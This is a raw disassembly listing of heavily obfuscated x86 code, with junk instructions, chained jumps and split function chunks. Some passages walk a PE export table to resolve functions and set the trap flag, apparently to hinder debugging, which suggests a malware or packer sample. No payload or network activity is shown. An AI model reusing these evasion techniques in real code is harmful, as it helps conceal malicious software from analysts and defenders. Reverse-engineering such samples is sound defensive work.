; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_425413: ; CODE XREF: sub_42CA29+1725�j
jmp nullsub_165
; END OF FUNCTION CHUNK FOR sub_42CA29
; =============== S U B R O U T I N E =======================================
sub_425418 proc near ; DATA XREF: _0182ofla:0042C177�o
; FUNCTION CHUNK AT 004246BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BB4 SIZE 00000005 BYTES
or eax, 15FC9CE3h
xor eax, 36447070h
jmp loc_429BB4
sub_425418 endp
; ---------------------------------------------------------------------------
loc_425429: ; DATA XREF: _0182ofla:00423A13�o
add ecx, 0DE7D459Dh
xchg ecx, [esp]
jmp nullsub_2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_425437: ; CODE XREF: TlsCallback_0-68CE�j
; sub_4253F4:loc_4259A3�j
shl ebp, 0Bh
; END OF FUNCTION CHUNK FOR sub_4253F4
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42543A: ; CODE XREF: sub_4253F4:loc_426472�j
; sub_42660C:loc_427E0E�j ...
call sub_42D15D
retn
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_425440: ; CODE XREF: sub_42B1F9-2D84�j
call nullsub_28
jmp loc_424152
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D897
loc_42544A: ; CODE XREF: sub_42D897+1D�j
push eax
ror eax, 7
jmp loc_429F73
; END OF FUNCTION CHUNK FOR sub_42D897
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258B7
loc_425453: ; CODE XREF: sub_4258B7�j
call sub_42C379
loc_425458: ; CODE XREF: sub_42B553+C�j
jmp loc_42C5E5
; END OF FUNCTION CHUNK FOR sub_4258B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425471
loc_42545D: ; CODE XREF: sub_425471+5�j
jmp nullsub_213
; END OF FUNCTION CHUNK FOR sub_425471
; ---------------------------------------------------------------------------
call sub_42E1F0
loc_425467: ; CODE XREF: _0182ofla:0042D0A1�j
jmp loc_429CAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42546C: ; CODE XREF: sub_429E52+D29�j
jmp loc_42B0D3
; END OF FUNCTION CHUNK FOR sub_429E52
; =============== S U B R O U T I N E =======================================
sub_425471 proc near ; CODE XREF: sub_42DF41-55A9�p
; FUNCTION CHUNK AT 0042545D SIZE 00000005 BYTES
push offset sub_429FC8
jmp loc_42545D
sub_425471 endp
; ---------------------------------------------------------------------------
push offset sub_424B86
jmp loc_429D45
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4286A8
loc_425485: ; CODE XREF: sub_4286A8:loc_42DCF6�j
push 1388h
call sub_425305
push offset loc_426FDC
jmp loc_42E4C7
; END OF FUNCTION CHUNK FOR sub_4286A8
; =============== S U B R O U T I N E =======================================
sub_425499 proc near ; CODE XREF: sub_42938A-50BC�p
; _0182ofla:004255CF�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423D87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004259D4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042741A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042DE64 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add edx, 0CDBEFFF1h
xchg edx, [esp+0]
jmp loc_42DE64
sub_425499 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_4254AB: ; CODE XREF: sub_4282B8+5�j
push 356A666Eh
mov edx, edi
jmp loc_428F4F
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_4254B7: ; DATA XREF: sub_42D056-37C9�o
pop edx
mov eax, offset loc_4254C1
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
loc_4254C1: ; DATA XREF: _0182ofla:004254B8�o
pop ecx
pop ebp
jmp loc_4291D1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4254C9: ; CODE XREF: _0182ofla:0042A471�j
jmp loc_42412F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_4254CE: ; CODE XREF: sub_42A642-2F88�j
jmp loc_4293DD
; END OF FUNCTION CHUNK FOR sub_42A642
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4254D3 proc near ; CODE XREF: sub_425B00:loc_429088�p
; sub_425B00+4C70�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423090 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423B19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425DC5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00426EC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A500 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042CCB3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042E631 SIZE 00000005 BYTES
push ebp
mov ebp, esp
loc_4254D6: ; CODE XREF: sub_429E52-1C62�j
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp loc_426EC7
sub_4254D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_4254E7: ; CODE XREF: sub_42DF41:loc_42D45A�j
sbb edx, edi
ror esi, 15h
jb loc_425B61
jmp loc_42AF61
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_4254F7: ; CODE XREF: sub_4249FA+77F6�j
xor edx, 70981035h
call sub_42D71D
push eax
ror eax, 1Ch
mov ds:dword_426FB8, eax
retn
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42550D: ; CODE XREF: sub_425BF8+5252�j
jmp loc_425710
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_425512: ; CODE XREF: sub_4249FA+5142�j
; sub_427239+73D5�j
rol eax, 1Ch
jmp loc_4235B8
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42551A: ; CODE XREF: sub_42B669+225C�j
xor esi, 746A3229h
; END OF FUNCTION CHUNK FOR sub_42B669
; START OF FUNCTION CHUNK FOR sub_429E52
loc_425520: ; CODE XREF: sub_429E52:loc_423B99�j
; sub_42798F-349C�j ...
jb loc_4281FC
cmp dword ptr [ebp-4], 5
jnz loc_42481C
jmp loc_42468A
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_425535: ; CODE XREF: sub_42349B:loc_42A3AC�j
ror edi, 8
sub ebx, 0BC83561h
jge sub_429AB1
jmp loc_42CD09
; END OF FUNCTION CHUNK FOR sub_42349B
; =============== S U B R O U T I N E =======================================
sub_425549 proc near ; DATA XREF: _0182ofla:0042E38B�o
xchg ebx, [esp+0]
jmp sub_42D71D
sub_425549 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_425551: ; CODE XREF: sub_42C415:loc_42A3B8�j
jnz loc_424037
jmp loc_42B213
; END OF FUNCTION CHUNK FOR sub_42C415
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42555D: ; CODE XREF: _0182ofla:0042B78C�j
jmp loc_424C3B
; ---------------------------------------------------------------------------
xor edi, ebp
jmp sub_42AAD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_425569: ; CODE XREF: sub_427445+7929�j
call sub_42D71D
pushf
mov [esp+8+var_8], eax
ror eax, 9
; END OF FUNCTION CHUNK FOR sub_427445
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_425575: ; CODE XREF: sub_4298DD:loc_429370�j
push ecx
jmp loc_42D3C9
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429203
loc_42557B: ; CODE XREF: sub_429203+42D8�j
push edx
ror ebx, 1Ah
loc_42557F: ; CODE XREF: sub_429203:loc_42CDAE�j
push edi
push 98910697h
pop edi
or edi, 0B73CF39h
rol edi, 1Eh
add edi, 1945CEB5h
jmp loc_429EB9
; END OF FUNCTION CHUNK FOR sub_429203
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42559A: ; CODE XREF: sub_424184+28C3�j
test esi, 0C39163B7h
jmp loc_4293C8
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
loc_4255A5: ; CODE XREF: _0182ofla:0042A58D�j
or esi, eax
shl eax, 0Fh
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4255AA: ; CODE XREF: sub_42798F+E8�j
; sub_42D056:loc_42A574�j
xor edx, 0A93E7EBAh
call sub_42D71D
push eax
jmp loc_425C23
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_4255BB proc near ; DATA XREF: sub_4284E7-40DB�o
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
push offset sub_425AB1
jmp loc_427682
sub_4255BB endp
; ---------------------------------------------------------------------------
pop ebp
jmp sub_425499
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_4255D4: ; CODE XREF: sub_425B6E:loc_4264E3�j
ja loc_425192
jmp loc_425D2A
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_4255DF: ; CODE XREF: sub_4291BA:loc_42539E�j
add ebx, 0F48BFF31h
mov [ebx], eax
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4291BA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4255E9 proc near ; CODE XREF: sub_427F03�p
; FUNCTION CHUNK AT 00424C75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B7C SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042869B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B4C9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D5D6 SIZE 0000000B BYTES
xchg ebp, [esp+0]
mov ebp, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42B4C9
sub_4255E9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_4255F9: ; CODE XREF: sub_426571+438C�j
; sub_42CC34:loc_42DC55�j
and esi, 0C2AAF7B3h
add esi, 0FDC18BFFh
mov [esi], eax
pop esi
call sub_42326C
push offset loc_4292A6
jmp loc_424E41
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
loc_425617: ; CODE XREF: _0182ofla:0042CD8F�j
jnp loc_42915F
; =============== S U B R O U T I N E =======================================
sub_42561D proc near ; CODE XREF: sub_425EA5:loc_42AAB6�p
; FUNCTION CHUNK AT 0042413A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042503E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042766D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004284C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B592 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E262 SIZE 0000000B BYTES
mov [esp+0], ecx
pop ecx
movzx eax, byte ptr [eax]
jmp loc_42413A
sub_42561D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425629 proc near ; CODE XREF: sub_427503�j
; DATA XREF: sub_4253F4+2105�o
var_4 = dword ptr -4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004231A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042351A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00423ECA SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004240C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004240CC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00424CA8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425644 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425EF6 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0042754D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427C71 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042AD62 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B565 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C59D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E4CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ED49 SIZE 0000000B BYTES
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
call sub_4280B6
jmp loc_4240CC
sub_425629 endp
; ---------------------------------------------------------------------------
pop ecx
jmp sub_427797
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_425644: ; CODE XREF: sub_425629:loc_42E4CC�j
push offset sub_428A17
jmp nullsub_171
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42564E: ; CODE XREF: _0182ofla:004253CB�j
; sub_42798F+F0�j ...
js loc_42EBE7
cmp dword ptr [ebp-4], 7
jnz loc_4236F0
jmp loc_42D6EC
; ---------------------------------------------------------------------------
loc_425663: ; CODE XREF: sub_42798F+246A�j
jnz loc_42C1F5
jmp loc_42C514
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42566E proc near ; CODE XREF: _0182ofla:00425776�j
; sub_4295D6:loc_42729C�p
mov [esp+0], edx
pop edx
rol eax, 13h
push eax
call sub_424CD8
retn
sub_42566E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42567C: ; CODE XREF: sub_425BF8+3416�j
jmp loc_4260E5
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_425681: ; CODE XREF: sub_42C1B2-8A64�j
jmp loc_424D90
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
word_425686 dw 0CCF0h ; CODE XREF: sub_42CED4+C�j
; ---------------------------------------------------------------------------
jmp loc_428AF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_42568D: ; CODE XREF: sub_42E218:loc_4242E2�j
xchg ecx, [esp+4+var_4]
jmp loc_424B9C
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
adc ebx, 74E1462Fh
jmp loc_423126
; ---------------------------------------------------------------------------
loc_4256A0: ; CODE XREF: _0182ofla:004294F2�j
jnb locret_427D2A
sub edx, ebp
jmp sub_429957
; =============== S U B R O U T I N E =======================================
sub_4256AD proc near ; CODE XREF: sub_423B08+C�p
; _0182ofla:0042E62B�j
; FUNCTION CHUNK AT 004259BC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425EE4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426ADD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429527 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429896 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D6BD SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_425EE4
jmp loc_429896
sub_4256AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4256C5: ; CODE XREF: _0182ofla:0042AD81�j
jl loc_425EB4
ror eax, 0Fh
jmp loc_42B8BE
; =============== S U B R O U T I N E =======================================
sub_4256D3 proc near ; CODE XREF: sub_428041:loc_4231B8�j
push ebx
mov ebp, [ebx]
jmp loc_42A0CF
sub_4256D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_4256DB: ; CODE XREF: sub_42D056-47D8�j
sbb edi, eax
cmp esi, 0DFB03AE1h
jmp loc_42987B
; END OF FUNCTION CHUNK FOR sub_42D056
; =============== S U B R O U T I N E =======================================
sub_4256E8 proc near ; DATA XREF: sub_428729:loc_4244CD�o
; FUNCTION CHUNK AT 00426199 SIZE 00000017 BYTES
push 4F122A45h
shl ebx, 1Fh
jmp loc_426199
sub_4256E8 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_4256F6: ; CODE XREF: _0182ofla:0042E7D0�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_4256F7: ; CODE XREF: sub_42E689:loc_428329�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
jmp loc_427572
; END OF FUNCTION CHUNK FOR sub_42E689
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_42570D: ; CODE XREF: sub_425BF8+C�j
mov eax, [eax+0Ch]
loc_425710: ; CODE XREF: sub_425BF8:loc_42550D�j
; _0182ofla:0042D4B9�j
jnz loc_428FFC
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_42AE31
jmp loc_42CA88
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E785
loc_42572D: ; CODE XREF: sub_42E785:loc_424358�j
mov [ebx], eax
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_42E785
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_425731: ; CODE XREF: sub_428F46+12DD�j
rol eax, 0Dh
push esi
jmp loc_424164
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B02
loc_42573A: ; CODE XREF: sub_427B02-37FA�j
xchg eax, [esp+8+var_8]
or eax, 100h
xchg eax, [esp+8+var_8]
popf
nop
jmp loc_4263DA
; END OF FUNCTION CHUNK FOR sub_427B02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42574D: ; CODE XREF: sub_423A2A+2D3B�j
jnz loc_42B41E
jmp loc_42E557
; END OF FUNCTION CHUNK FOR sub_423A2A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_425759: ; DATA XREF: sub_42EAB7-59C4�o
mov eax, [ebp-1Ch]
mov eax, ds:dword_42B8F8[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_42D607
jmp loc_42A9B2
; ---------------------------------------------------------------------------
popf
jmp sub_42566E
; ---------------------------------------------------------------------------
db 0B1h
dword_42577C dd 0 ; DATA XREF: _0182ofla:loc_42523C�w
; sub_4271AD+4�r ...
dword_425780 dd 3D114530h ; DATA XREF: sub_4235A0�o
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_425784: ; CODE XREF: sub_42E689-6394�j
jmp nullsub_191
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
db 44h, 1, 0E8h
dword_42578C dd 0CCh ; DATA XREF: sub_424BCB-CA9�r
; sub_428336�w ...
dword_425790 dd 76Ch ; DATA XREF: sub_42B15E+4�r
; sub_42B15E+13�w
dword_425794 dd 9DDF51D8h ; DATA XREF: sub_4253DC-173D�r
; sub_428CFF+3�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D6DD
loc_425798: ; CODE XREF: sub_42D6DD+A�j
jmp loc_423F9B
; END OF FUNCTION CHUNK FOR sub_42D6DD
; ---------------------------------------------------------------------------
loc_42579D: ; CODE XREF: _0182ofla:004264D8�j
jmp locret_42D702
; ---------------------------------------------------------------------------
dw 3C2Ah
dword_4257A4 dd 77D40000h ; DATA XREF: sub_42660C+3�r
; _0182ofla:loc_426C70�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1C8
loc_4257A8: ; CODE XREF: sub_42E1C8+D�j
jmp loc_42621B
; END OF FUNCTION CHUNK FOR sub_42E1C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_4257AD: ; CODE XREF: sub_428C7D+E�j
jmp loc_42851A
; END OF FUNCTION CHUNK FOR sub_428C7D
; ---------------------------------------------------------------------------
inc edx
sub al, 0AEh
wait
pop ecx
daa
xor ecx, eax
db 2Eh
enter 6C6Ch, 0
; START OF FUNCTION CHUNK FOR sub_424C61
loc_4257BF: ; CODE XREF: sub_424C61+3FE8�j
jmp nullsub_47
; END OF FUNCTION CHUNK FOR sub_424C61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A70
loc_4257C4: ; CODE XREF: sub_424A70+18�j
jmp loc_4267BD
; END OF FUNCTION CHUNK FOR sub_424A70
; ---------------------------------------------------------------------------
loc_4257C9: ; CODE XREF: _0182ofla:0042424F�j
jmp loc_42D96B
; ---------------------------------------------------------------------------
dw 3BDh
; ---------------------------------------------------------------------------
retf 0FD00h
; ---------------------------------------------------------------------------
db 0CEh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A70
loc_4257D4: ; CODE XREF: sub_424A70+9EA0�j
jmp loc_42A98D
; END OF FUNCTION CHUNK FOR sub_424A70
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_4257DA: ; CODE XREF: sub_428D63:loc_42A17C�j
jns loc_425E9E
xchg eax, esi
jnz loc_42D132
jmp loc_42ABE9
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_4257ED: ; CODE XREF: _0182ofla:0042B71C�j
pop ecx
call sub_42B182
; START OF FUNCTION CHUNK FOR sub_42D888
loc_4257F3: ; CODE XREF: sub_42D888+A�j
jmp loc_42416E
; END OF FUNCTION CHUNK FOR sub_42D888
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4257F8: ; CODE XREF: sub_42798F+EFA�j
rol edx, 0Fh
sub ebx, ecx
shl edx, 11h
shr ebp, 0Fh
jmp loc_4288D7
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB53
loc_425808: ; CODE XREF: sub_42CB53:loc_42861A�j
and eax, 0F798AECAh
sub eax, 0B3F97850h
add eax, 0A3E0CDF0h
xchg eax, [esp+8+var_8]
mov eax, [ebp-4]
push eax
jmp loc_428F72
; END OF FUNCTION CHUNK FOR sub_42CB53
; ---------------------------------------------------------------------------
mov edx, 0B242B436h
call sub_4238A3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C9E6
loc_425831: ; CODE XREF: sub_42C9E6+E05�j
jmp sub_42C2CC
; END OF FUNCTION CHUNK FOR sub_42C9E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4238F9
loc_425836: ; CODE XREF: sub_4238F9+F�j
jmp nullsub_21
; END OF FUNCTION CHUNK FOR sub_4238F9
; =============== S U B R O U T I N E =======================================
sub_42583B proc near ; DATA XREF: _0182ofla:00424AEE�o
; FUNCTION CHUNK AT 00424AF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425CFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426ED5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042916F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042C770 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C924 SIZE 0000001F BYTES
call sub_42D71D
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_423F31
jmp loc_42C770
sub_42583B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_425852: ; CODE XREF: sub_425DA5+24E5�j
test al, al
jz loc_42B597
jmp loc_4294CA
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
loc_42585F: ; CODE XREF: _0182ofla:00426A99�j
jo loc_42C6CC
add edx, edi
jmp loc_4235EA
; ---------------------------------------------------------------------------
push dword ptr [ebp-4]
call sub_4271D2
jmp loc_42C1B9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425879 proc near ; CODE XREF: sub_42EA15-A1F�j
push ebp
mov ebp, esp
call sub_423F73
sub_425879 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E395
loc_425881: ; CODE XREF: sub_42E395-4831�j
jmp loc_429C0D
; END OF FUNCTION CHUNK FOR sub_42E395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_425886: ; CODE XREF: sub_4253F4+37E1�j
jmp loc_423DD1
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42588B: ; CODE XREF: sub_4271D2:loc_42C695�j
xchg ebp, [esp+0]
ror eax, 12h
mov ds:dword_423194, eax
jmp loc_42B56A
; ---------------------------------------------------------------------------
loc_42589C: ; CODE XREF: sub_4271D2�j
push offset sub_42AC07
loc_4258A1: ; CODE XREF: _0182ofla:0042DBA4�j
jmp nullsub_32
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
or edi, 8DEF6DE6h
jmp loc_4283BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_4258B1: ; CODE XREF: sub_42940E+1929�j
call sub_424CD8
retn
; END OF FUNCTION CHUNK FOR sub_42940E
; =============== S U B R O U T I N E =======================================
sub_4258B7 proc near ; CODE XREF: sub_42660C+D7C�p
; sub_4278DB:loc_42AD2E�j
; FUNCTION CHUNK AT 00425453 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C5E5 SIZE 0000000A BYTES
jo loc_425453
push ebp
mov ebp, esp
push offset loc_426180
jmp nullsub_22
sub_4258B7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test eax, eax
jz loc_4236F0
jmp loc_42E7FA
; ---------------------------------------------------------------------------
loc_4258D7: ; DATA XREF: _0182ofla:loc_4234FC�o
lea eax, [ebp-24h]
push 37065B10h
mov [esp], eax
push 40h
lea eax, [ebp-64h]
loc_4258E7: ; CODE XREF: _0182ofla:loc_4291A2�j
push eax
push 400000h
mov eax, [ebp-10h]
jmp loc_42E6AD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4258F5 proc near ; CODE XREF: sub_42ECAD�j
var_8 = dword ptr -8
var_1 = byte ptr -1
; FUNCTION CHUNK AT 00425C38 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C9F8 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_1], al
jmp loc_42C9F8
sub_4258F5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428110
loc_425903: ; CODE XREF: sub_428110+C�j
jz loc_42DCB2
jmp loc_42C7C5
; END OF FUNCTION CHUNK FOR sub_428110
; ---------------------------------------------------------------------------
loc_42590E: ; CODE XREF: _0182ofla:0042748C�j
shr eax, 7
loc_425911: ; CODE XREF: _0182ofla:loc_427067�j
call nullsub_138
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_425917: ; CODE XREF: sub_425063+7922�j
jmp loc_428FA7
; END OF FUNCTION CHUNK FOR sub_425063
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42591C: ; CODE XREF: sub_42798F:loc_42810B�j
; sub_423A2A+5C3B�j
jmp loc_42B5A1
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_425921: ; CODE XREF: sub_423F50+10�j
jmp loc_423D49
; END OF FUNCTION CHUNK FOR sub_423F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_425926: ; CODE XREF: sub_423A2A:loc_42CB26�j
call sub_423FCD
test al, al
jz loc_426758
jmp loc_42670D
; END OF FUNCTION CHUNK FOR sub_423A2A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
